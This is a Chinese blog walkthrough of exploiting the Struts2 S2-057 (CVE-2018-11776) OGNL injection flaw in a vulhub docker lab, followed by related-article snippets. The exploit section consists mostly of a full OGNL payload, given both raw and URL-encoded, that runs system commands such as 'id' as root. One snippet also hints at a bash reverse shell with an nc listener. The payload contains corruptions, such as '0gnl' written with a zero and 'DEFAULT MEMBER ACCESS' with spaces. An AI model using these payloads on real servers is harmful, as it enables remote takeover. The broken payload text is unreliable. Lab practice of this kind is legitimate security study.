【vulhub靶场之struts2】——s2-057

最新推荐文章于 2024-09-23 17:16:31 发布
最新推荐文章于 2024-09-23 17:16:31 发布
阅读量652 收藏 1
点赞数 8
分类专栏: Vulnhub靶场 常见框架漏洞 文章标签: struts java 后端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_57240513/article/details/140994171
版权

漏洞简介:

        漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。
S2-057 先决条件:
        alwaysSelectFullNamespace 正确-操作元素未设置名称空间属性,或使用了通配符用户将从 uri 传递命名空间,并将其解析为 OGNL 表达式,最终导致远程代码执行漏洞。

漏洞利用:

第一步:打开环境

cd vulhub/struts2/s2-057
docker-compose up -d
docker-compose ps

第二步:访问靶机地址

ip地址/struts2-showcase

在url处输入如下代码

 http://ip地址struts2-
showcase/${(123+123)}/actionChain1.action

刷新可以看到中间数字位置相加了

第三步:构建payload,抓包。

将上面验证payload的值替换为我们的,利用exp。抓 http://ip地址struts2-
showcase/${(123+123)}/actionChain1.action的包。

将下方的代码url编码后插入到原来的${(123+123)},将其替换掉。

${
(#dm=@ognl.0gnlContext@DEFAULT MEMBER ACCESS).(#ct=#request['struts.valuestack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.0gnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id' )).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

编码后是: 

%24%7B%0A(%23dm%3D%40ognl.0gnlContext%40DEFAULT%20MEMBER%20ACCESS).(%23ct%3D%23request%5B'struts.valuestack'%5D.context).(%23cr%3D%23ct%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.0gnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec('id'%20)).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D

 可以查看到了id的信息,

将其改为whoami或者其他的系统命令,查看到当前的用户为root。

[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135)
qq_51577576的博客
11-19 944
[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135) Apache Struts 2是用于开发JavaEE Web应用程序的开源Web应用框架。Apache Struts 2.0.0至2.3.14.2版本中存在远程命令执行漏洞。远程攻击者可借助带有‘${}’和‘%{}’序列值(可导致判断OGNL代码两次)的请求,利用该漏洞执行任意OGNL代码。
Vulhub——struct2
qq_55202378的博客
07-03 1640
Struts2框架,用于开发Java EE网络应用程序的开放源代码网页应用程序架构。Struts2是一个基于MVC设计思路的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中(Model负责数据维护,包括数据和业务逻辑(Action),View负责向用户呈现数据(Result),Controller通过代码控制),Struts2作为控制器来建立模型与视图的数据交互。Struct2是一个Java网站框架。
struts2 S2-057远程执行代码漏洞 靶场攻略
shw_yzh的博客
09-23 295
环境环境vulhub靶场 /struts2/s2-057漏洞简介漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程代码执⾏漏洞的发⽣。
vulfocus靶场---struts2-CVE-2017-979
RanQ的博客
09-16 399
小白手把手脚本小子打靶struts2漏洞。
Struts2-057远程代码执行漏洞(s2-057)复现
m0_48520508的博客
12-10 992
0x00简介 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 0x01漏洞概述 漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并
vulhub-struts2
bqnagus
10-03 2088
vulhub-struts2 复现
struts2 S2-057(CVE-2018-11776)
Z_l123的博客
03-01 1235
漏洞介绍 该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行;url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行. 受影响版本 <=Struts2.3.34,Struts 2.5.16 漏洞复现 1.访问地址 http://ip:port/strut..
vulhub系列之struts2(s2-001、s2-007、s2-008、s2-009、s2-012)
weixin_43071873的博客
11-26 1480
S2-001 远程代码执行漏洞 漏洞详情: 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响版本: Struts 2.0.0 - Struts 2.0.8 漏洞复现: 测试漏洞,%{1+1} 提交后报错返回解析为
struts2漏洞分析(S2-057为例)
hldfight
04-15 3113
0x00 前言 利用空闲时间分析了一下struts2框架的历史高危漏洞,发现除了S2-052(XStream反序列化漏洞)以外,其他漏洞的本质都是由于框架执行了恶意用户传进来的OGNL表达式,从而造成远程代码执行。只不过需要精心构造不同的OGNL代码而已。 发生OGNL表达式注入的点也是多种多样,如:请求参数名、请求参数值、content-type请求头、文件上传时的filename值、url地址...
vulhub靶场搭建安装包,包含docker-compose安装包
02-01
使用这条命令西在docker-compose太慢了而且老失败 sudo curl -L "https://github.com/docker/compose/releases/download/1.29.2/docker-compose-$(uname -s)-$...我这边包需要下载的都提供了,助力你搭建vulhub靶场
vulhub靶场struts2漏洞复现
weixin_44300286的博客
03-06 2984
0x01、S2-001远程代码执行漏洞 原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响版本 Struts 2.0.0 - Struts 2.0.8 poc 执行任意命令 %{#a=(new java.lan
用于Vulhub靶场练习的主机:DC-2.ova
最新发布
10-28
DC系列靶机DC-2渗透,适用于学习网络安全,渗透测试等人群,仅供练习使用,请勿做触犯法律的事情
vulfocus 靶场struts2 代码执行 (CVE-2020-17530)
没有故事
04-24 1601
由于Struts2 会对某些标签属性(比如 id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时,用户即可构造一些SSRF、远程命令执行等形式的payload,并将这些恶意payload以%{...}形式传入该标签属性, 即可造成OGNL表达式执行。bash -c {echo,编码后的内容} |{base64 ,-d}|{bash , -i} #或: 抓包,改为如下内容: 红色部分为要更改的地方。监听机进行监听:nc -lvvp。
struts2,S2-057远程执行代码漏洞
weixin_69065643的博客
08-07 1112
在url处输入 /${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了。抓包,将246验证位置换成我们的payload。访问网站的/struts2-showcase。
Apache Struts2 S2-057 漏洞POC【内附彩蛋】
大哥一声吼
08-23 7546
前导知识 官网参考链接:https://cwiki.apache.org/confluence/display/WW/S2-057 漏洞影响范围:Struts 2.3 - Struts 2.3.34, Struts 2.5 - Struts 2.5.16 CVE编号:CVE-2018-11776 最重要环节,漏洞POC: https://github.com/TheKingOfD...
Vulhub靶场struts2漏洞复现
weixin_66717977的博客
03-21 1889
struts2漏洞中属s2系列杀伤力最大,本文基于vulhub靶场,将介绍并复现strut2漏洞
vulhub】structs2远程命令执行 CVE-2018-11776(S2-057
weixin_42884199的博客
12-06 629
前提 1、alwaysSelectFullNamespace被设置为true,此时namespace的值是从URL中获取的。URL是可控的,所以namespace也是可控的。 2、action元素没有名称空间属性集,或者使用通配符。该名称空间将由用户从URL传递并解析为OGNL表达式,最终导致远程代码执行的脆弱性。 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload URL: http://192.168.150.146:8080/s
Struts2 S2-057 远程代码执行漏洞(CVE-2018-11776)
玄道的网安博客
06-30 842
影响环境 Struts<= Struts 2.3.34, Struts 2.5.16 环境搭建 cd vulhub/struts2/s2-057 docker-compose up -d 启动环境后,访问http://your-ip: 8080/show/,您将看到Struts2测试页面。 利用 S2-057要求具备以下条件: action元素没有设置名称空间属性,或者使用了通配符 名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。 Pa..
vulhub学习笔记-struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行
ploto_cs的博客
09-11 1827
Struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行 一.漏洞介绍 (一)编号 S2-057 (二)概述 S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去 (三)影响版本 Apache Struts 2.3 – Struts 2.3.34 Apache Struts 2.5 – Struts
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值